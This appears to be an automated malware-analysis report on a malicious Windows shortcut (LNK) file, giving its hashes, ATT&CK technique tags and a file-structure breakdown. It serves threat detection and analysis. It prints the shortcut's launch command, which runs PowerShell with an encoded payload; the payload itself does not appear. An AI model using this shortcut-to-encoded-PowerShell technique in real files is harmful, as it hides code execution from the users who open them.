Malicious

3bf12a065c4bf9abfc4985443bc66915

LNK File | MD5: 3bf12a065c4bf9abfc4985443bc66915 | Size: 3.09 KB | application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated

Characteristics
Hash | Hash Value
MD5 | 3bf12a065c4bf9abfc4985443bc66915
Sha1 | 27ebd4c4e443da4683a2cb874f7edf67b6293c58
Sha256 | de20b5640a5b340f67159be3c996930649bca93745946da26e76ffb3bd8c3fc0
Sha384 | 7af72d16a7950ed6705cf0473fd3d05136397b9d4cb2aa00fac3191f3019d8087baebdb2f2ed2a4bf238e0faceff6277
Sha512 | c9bcbc832292414347ea5668462537f8f85de1197c55e6023ff5f5573a0b085be830e7e1415a2888e81e8b690b2b2037600b6d6d7a7c0067cbde5f7f6f936740
SSDeep | 24:8Ayw/BHYVKVWf+/CW9Op19z4PSCvFu6jkyXCIyjH343Hsab/srsysh6FtmVdd792:8y5ayM3CvFu8/XEQVh6FtmVdJ9Aa
TLSH | A851202409F601FAF673CBB997F573F245A6FBE28C2496BC108067420762554E4A3E7A
File Structure
3bf12a065c4bf9abfc4985443bc66915
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
Value
LNK: Command Execution

powershell.exe powershell -E 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

Deobfuscated PowerShell

-e "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"
